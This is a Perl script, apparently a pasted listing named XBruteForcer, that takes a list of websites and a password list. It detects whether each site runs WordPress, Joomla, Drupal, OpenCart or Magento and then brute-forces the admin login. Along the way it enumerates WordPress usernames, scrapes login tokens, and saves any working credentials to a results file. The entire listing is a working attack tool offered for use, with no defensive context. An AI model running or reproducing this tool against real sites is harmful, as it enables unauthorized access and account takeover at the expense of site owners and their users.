bruteforce

1. #!/usr/bin/perl
2.  
3. #past here
4. use Term::ANSIColor;
5. use URI::URL;
6. use Getopt::Long;
7. use LWP::UserAgent;
8. use IO::Socket::INET;
9. use HTTP::Request;
10. use HTTP::Cookies;
11. use HTTP::Request::Common qw(POST);
12. use HTTP::Request::Common qw(GET);
13.  
14. $ua = LWP::UserAgent->new(keep_alive => 1);
15. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
16. $ua->timeout (10);
17.  
18. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
19.  
20. GetOptions(
21. "l|list=s" => \$list,
22. "p|passwords=s" => \$pass,
23. );
24.  
25. banner();
26.  
27. unless ($list|$pass) { help(); }
28. if ($list|$pass) { XBruteForcer(); }
29.  
30. sub banner() {
31. print color('bold red')," __ __ ";
32. print color('bold white')," ____ _ ______ \n";
33. print color('bold red')," \\ \\ / / ";
34. print color('bold white')," | _ \\ | | | ____| \n";
35. print color('bold red')," \\ V / ";
36. print color('bold white')," | |_) |_ __ _ _| |_ ___ | |__ __ _ __ ___ ___ _ __ \n";
37. print color('bold red')," > < ";
38. print color('bold white')," | _ <| '__| | | | _/ _ \\ | __/ _ \\| '__/ __/ _ \\ '__|\n";
39. print color('bold red')," / . \\ ";
40. print color('bold white')," | |_) | | | |_| | || __/ | | | (_) | | | (_| __/ | \n";
41. print color('bold red')," /_/ \\_\\ ";
42. print color('bold white')," |____/|_| \\__,_|\\__\\___| |_| \\___/|_| \\___\\___|_| ";
43. print color('bold red'),"v1.1\n\n";
44. print color('bold red'),"\t\t [";
45. print color('bold white'),"Coded BY Mohamed Riahi";
46. print color('bold red'),"]\n";
47. print color('reset');
48. };
49.  
50. sub help {
51. print q(
52. Usage: perl XBruteForcer.pl -l list.txt -p passwords.txt
53.  
54. OPTIONS:
55. -l => websites list
56. -p => Passwords list
57. );
58. }
59. sub XBruteForcer {
60. print color('bold red'),"[";
61. print color('bold green'),"1";
62. print color('bold red'),"]";
63. print color('bold white')," WordPress \n";
64. print color('bold red'),"[";
65. print color('bold green');
66. print color('bold green'),"2";
67. print color('bold red'),"]";
68. print color('bold white')," Joomla \n";
69. print color('bold red'),"[";
70. print color('bold green'),"3";
71. print color('bold red'),"]";
72. print color('bold white')," DruPal \n";
73. print color('bold red'),"[";
74. print color('bold green'),"4";
75. print color('bold red'),"]";
76. print color('bold white')," OpenCart \n";
77. print color('bold red'),"[";
78. print color('bold green'),"5";
79. print color('bold red'),"]";
80. print color('bold white')," Magento \n";
81. print color('bold red'),"[";
82. print color('bold green'),"6";
83. print color('bold red'),"]";
84. print color('bold white')," Auto \n";
85. print color('bold red'),"[";
86. print color('bold green'),"+";
87. print color('bold red'),"]";
88. print color('bold white')," Choose Number : ";
89.  
90. my $number = <STDIN>;
91. chomp $number;
92.  
93. if($number eq '1')
94. {
95. open (THETARGET, "<$list") || die "[-] Can't open the file";
96. @TARGETS = <THETARGET>;
97. close THETARGET;
98. $link=$#TARGETS + 1;
99.  
100. OUTER: foreach $site(@TARGETS){
101. chomp($site);
102.  
103. print "\n[*] URL: $site\n";
104. wpuser();
105. }
106. }
107.  
108. if($number eq '2')
109. {
110.  
111. open (THETARGET, "<$list") || die "[-] Can't open the file";
112. @TARGETS = <THETARGET>;
113. close THETARGET;
114. $link=$#TARGETS + 1;
115.  
116. OUTER: foreach $site(@TARGETS){
117. chomp($site);
118.  
119. print "\n[*] URL: $site\n";
120. joomla();
121. }
122. }
123.  
124. if($number eq '3')
125. {
126.  
127. open (THETARGET, "<$list") || die "[-] Can't open the file";
128. @TARGETS = <THETARGET>;
129. close THETARGET;
130. $link=$#TARGETS + 1;
131.  
132. OUTER: foreach $site(@TARGETS){
133. chomp($site);
134.  
135. print "\n[*] URL: $site\n";
136. drupal();
137. }
138. }
139.  
140. if($number eq '4')
141. {
142.  
143. open (THETARGET, "<$list") || die "[-] Can't open the file";
144. @TARGETS = <THETARGET>;
145. close THETARGET;
146. $link=$#TARGETS + 1;
147.  
148. OUTER: foreach $site(@TARGETS){
149. chomp($site);
150.  
151. print "\n\n[*] URL: $site\n";
152. opencart();
153. }
154. }
155.  
156. if($number eq '5')
157. {
158.  
159. open (THETARGET, "<$list") || die "[-] Can't open the file";
160. @TARGETS = <THETARGET>;
161. close THETARGET;
162. $link=$#TARGETS + 1;
163.  
164. OUTER: foreach $site(@TARGETS){
165. chomp($site);
166.  
167. print "\n\n[*] URL: $site\n";
168. magento();
169. }
170. }
171. if($number eq '6')
172. {
173.  
174. open (THETARGET, "<$list") || die "[-] Can't open the file";
175. @TARGETS = <THETARGET>;
176. close THETARGET;
177. $link=$#TARGETS + 1;
178.  
179. OUTER: foreach $site(@TARGETS){
180. chomp($site);
181.  
182. print "\n\n[*] URL: $site";
183. cms();
184. }
185. }
186. }
187.  
188. ################ CMS DETCTER #####################
189. sub cms(){
190. $magsite = $site . '/admin';
191. my $magcms = $ua->get("$magsite")->content;
192. my $cms = $ua->get("$site")->content;
193. if($cms =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>| \/media\/system\/js\/|com_content|Joomla!/) {
194. print color("bold white"), " - Joomla\n\n";
195. joomla();
196. }
197. elsif($cms =~/Drupal|drupal|sites\/all|drupal.org/) {
198. print color("bold white"), " - Drupal\n\n";
199. drupal();
200. }
201. elsif($cms =~/wp-content|wordpress/) {
202. print color("bold white"), " - WordPress\n\n";
203. wpuser();
204. }
205. elsif($cms =~/route=product|OpenCart|route=common|catalog\/view\/theme/) {
206. print color("bold white"), " - OpenCart\n\n";
207. opencart();
208. }
209. elsif($magcms =~/Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento/) {
210. print color("bold white"), " - Magento\n\n";
211. magento();
212. }
213. else{
214. print color("bold white"), " - Unknown\n\n";
215. }
216. }
217.  
218. ###### GET WP USER #######
219. sub wpuser{
220. print color('reset');
221. $user = $site . '/?author=1';
222.  
223. $getuser = $ua->get($user)->content;
224. if($getuser =~/author\/(.*?)\//){
225. $wpuser=$1;
226. print "[+] Username: $wpuser\n";
227. wp();
228. }
229. else {
230. print "Can't Get Username\n\n";
231. }
232. }
233.  
234. ###### WorDPress #######
235. sub wp{
236. print"[-] Starting brute force";
237. open(a,"<$pass") or die "$!";
238. while(<a>){
239. chomp($_);
240. $wp = $site . '/wp-login.php';
241. $redirect = $site . '/wp-admin/';
242. $wpass = $_;
243. print "\n[-] Trying: $wpass ";
244. $wpbrute = POST $wp, [log => $wpuser, pwd => $wpass, wp-submit => 'Log In', redirect_to => $redirect];
245. $response = $ua->request($wpbrute);
246. $stat = $response->status_line;
247. if ($stat =~ /302/){
248.  
249. print "- ";
250. print color('bold green'),"FOUND\n";
251. print color('reset');
252.  
253. open (TEXT, '>>Result.txt');
254. print TEXT "$wp ==> User: $wpuser Pass: $wpass\n";
255. close (TEXT);
256. next OUTER;
257. }
258. }
259. }
260.  
261. ###### Joomla #######
262. sub joomla{
263. $joomsite = $site . '/administrator/index.php';
264.  
265. $ua = LWP::UserAgent->new(keep_alive => 1);
266. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
267. $ua->timeout (30);
268. $ua->cookie_jar(
269. HTTP::Cookies->new(
270. file => 'mycookies.txt',
271. autosave => 1
272. )
273. );
274.  
275.  
276. $getoken = $ua->get($joomsite)->content;
277. if ( $getoken =~ /name="(.*)" value="1"/ ) {
278. $token = $1 ;
279. }else{
280. print "[-] Can't Grabb Joomla Token !\n";
281. next OUTER;
282. }
283.  
284. print"[-] Starting brute force";
285. open(a,"<$pass") or die "$!";
286. while(<a>){
287. chomp($_);
288. $joomuser = admin;
289. $joompass = $_;
290. print "\n[-] Trying: $joompass ";
291. $joomlabrute = POST $joomsite, [username => $joomuser, passwd => $joompass, lang =>en-GB, option => user_login, task => login, $token => 1];
292. $response = $ua->request($joomlabrute);
293.  
294. my $check = $ua->get("$joomsite")->content;
295. if ($check =~ /logout/){
296. print "- ";
297. print color('bold green'),"FOUND\n";
298. print color('reset');
299.  
300. open (TEXT, '>>Result.txt');
301. print TEXT "$joomsite => User: $joomuser Pass: $joompass\n";
302. close (TEXT);
303. next OUTER;
304. }
305. }
306. }
307.  
308. ######DruPal#######
309. sub drupal{
310. print"[-] Starting brute force";
311. open(a,"<$pass") or die "$!";
312. while(<a>){
313. chomp($_);
314. $druser = admin;
315. $drupass = $_;
316. print "\n[-] Trying: $drupass ";
317.  
318. $drupal = $site . '/user/login';
319. $redirect = $site . '/user/1';
320.  
321. $drupalbrute = POST $drupal, [name => $druser, pass => $drupass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $redirect];
322. $response = $ua->request($drupalbrute);
323. $stat = $response->status_line;
324. if ($stat =~ /302/){
325. print "- ";
326. print color('bold green'),"FOUND\n";
327. print color('reset');
328.  
329. open (TEXT, '>>Result.txt');
330. print TEXT "$drupal => User: $druser Pass: $drupass\n";
331. close (TEXT);
332. next OUTER;
333. }
334. }
335. }
336.  
337. ###### OpenCart #######
338. sub opencart{
339. print"[-] Starting brute force";
340. open(a,"<$pass") or die "$!";
341. while(<a>){
342. chomp($_);
343. $ocuser = admin;
344. $ocpass = $_;
345. print "\n[-] Trying: $ocpass ";
346. $OpenCart= $site . '/admin/index.php';
347.  
348. $ocbrute = POST $OpenCart, [username => $ocuser, password => $ocpass,];
349. $response = $ua->request($ocbrute);
350. $stat = $response->status_line;
351. if ($stat =~ /302/){
352. print "- ";
353. print color('bold green'),"FOUND\n";
354. print color('reset');
355. open (TEXT, '>>Result.txt');
356. print TEXT "$OpenCart => User: $ocuser Pass: $ocpass\n";
357. close (TEXT);
358. next OUTER;
359. }
360. }
361. }
362.  
363. ###### Magento #######
364. sub magento{
365. $magsite = $site . '/admin';
366.  
367. $ua = LWP::UserAgent->new(keep_alive => 1);
368. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
369. $ua->timeout (30);
370. $ua->cookie_jar(
371. HTTP::Cookies->new(
372. file => 'mycookies.txt',
373. autosave => 1
374. )
375. );
376.  
377. $getoken = $ua->get($magsite)->content;
378. if ( $getoken =~ /type="hidden" value="(.*)"/ ) {
379. $token = $1 ;
380. }else{
381. print "[-] Can't Grabb Magento Token !\n";
382. next OUTER;
383. }
384.  
385. print"[-] Starting brute force";
386. open(a,"<$pass") or die "$!";
387. while(<a>){
388. chomp($_);
389. $maguser = "admin";
390. $magpass = $_;
391. print "\n[-] Trying: $magpass ";
392.  
393. $magbrute = POST $magsite, ["form_key" => "$token", "login[username]" => "$maguser", "dummy" => "", "login[password]" => "$magpass"];
394. $response = $ua->request($magbrute);
395. my $pwnd = $ua->get("$magsite")->content;
396. if ($pwnd =~ /logout/){
397. print "- ";
398. print color('bold green'),"FOUND\n";
399. print color('reset');
400. open (TEXT, '>>Result.txt');
401. print TEXT "$magsite => User: $maguser Pass: $magpass\n";
402. close (TEXT);
403. next OUTER;
404. }
405. }
406. }